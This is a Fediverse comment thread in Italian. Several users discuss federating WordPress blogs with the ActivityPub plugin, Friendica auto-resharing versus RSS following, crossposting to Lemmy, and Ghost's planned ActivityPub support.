Unknown parent • •@marco acorte ho inserito il blog achortech tra i blog da ricondividere, ma il blog acor3.it mi dà invece un errore che ho già ricevuto altre volte da alcuni blog wordpress. Un bel giorno riuscirò a capire a cosa è dovuto questo problema, ma non è questo il giorno... 🤔😭
@Signor Amministratore @Matthias Pfefferle
Il blogverso italiano di Wordpress
Unknown parent • •@marco acorte ecco allora cosa potrebbe essere! Se hai modo di disabilitarlo sul nostro IP, posso provare a vedere se riesco a seguire il tuo account
@Signor Amministratore
Il blogverso italiano di Wordpress
Unknown parent • •Matthias Pfefferle
in reply to Paolo Redaelli • • •Sensitive content
Signor Amministratore ⁂ likes this.
Signor Amministratore ⁂ reshared this.
informapirata ⁂
Unknown parent • • •@talksina attenzione: se il blog è già federato Activitypub, Friendica non ha bisogno di recuperare il feed ma può semplicemente ricondividere automaticamente l'account WordPress.
In pratica:
- Blog NON federato: l'account Friendica segue il feed RSS, lo cattura e lo condivide come se l'avesse scritto lui
- Blog federato: l'account Friendica non segue tramite RSS MA tramite ActivityPub e non fa altro che il retweet automatico del post
@admin @fediverso @blogverso @pfefferle @writefreely
Il blogverso italiano di Wordpress
Unknown parent • •@marco acorte per curiosità, come è nata questa impostazione di blocco? Si sviluppa di default ogni volta che vengono rilevati più tentativi di connessione?
E come si possono modificare gli indirizzi da bloccare?
@Signor Amministratore
Signor Amministratore ⁂
Unknown parent • •@Lorenzo Grazie! Non ne sapevo nulla...
Allora in bocca al lupo a @Il Disinformatico per il trasloco e, naturalmente, ci aspettiamo che installi il plugin Activitypub for Wordpress 😁
@Il blogverso italiano di Wordpress
informapirata ⁂ reshared this.
Signor Amministratore ⁂
Unknown parent • •@Il Disinformatico sì, si tratta di un plugin fantastico, sviluppato da @Matthias Pfefferle (una delle personalità più interessanti e disponibili del Fediverso)
Tra le altre cose, puoi far sì che i tuoi post vengano crosspostati in una comunità Lemmy (il "Reddit" del Fediverso), semplicemente menzionando la comunità Lemmy che ritieni più adatta nel tuo post.
Qui ho scritto una breve guida:
informapirata.it/2024/01/02/e-…
@Lorenzo @Il blogverso italiano di Wordpress
informapirata
2024-01-02 18:42:54
like this
𝔻𝕚𝕖𝕘𝕠 🦝🧑🏻💻🍕 likes this.
reshared this
informapirata ⁂ e Al Kath reshared this.
Signor Amministratore ⁂
Unknown parent • •@𝔫𝕖𝚖ƴ᥉ qualcosa è già stato fatto, ma l'integrazione piena di ActivityPub in Ghost è comunque prevista entro fine anno
activitypub.ghost.org/
@Il blogverso italiano di Wordpress
reshared this
informapirata ⁂ e I blog di Writefreely reshared this.
Al Kath
in reply to Signor Amministratore ⁂ • • •che bello vedere che esistono tutti questi fantastici progetti per un web di nuovo aperto! E adesso che faranno quelli che un anno fa dicevano che il Fediverso era morto? 😂
@pfefferle @ildisinformatico @enzoesco @blogverso
Matthias Pfefferle
in reply to Signor Amministratore ⁂ • • •> "una delle personalità più interessanti e disponibili del Fediverso"
Grazie mille ❤️
Signor Amministratore ⁂ likes this.
djpanini
in reply to Signor Amministratore ⁂ • •Signor Amministratore ⁂
in reply to djpanini • •Per trovare il tuo contatto, Devi incollare il nickname completo o il link del profilo nella casella di ricerca Friendica.
Poi è fondamentale seguire quel profilo, perché se non lo segui non puoi attivare le funzionalità di repost automatico.
Infine, dovrei andare nella seconda sezione disponibile sulla pagina Friendica del tuo profilo remoto, ossia impostazioni contatto, e selezionare ricondivisione nativa
djpanini reshared this.
djpanini
in reply to Signor Amministratore ⁂ • •Signor Amministratore ⁂ likes this.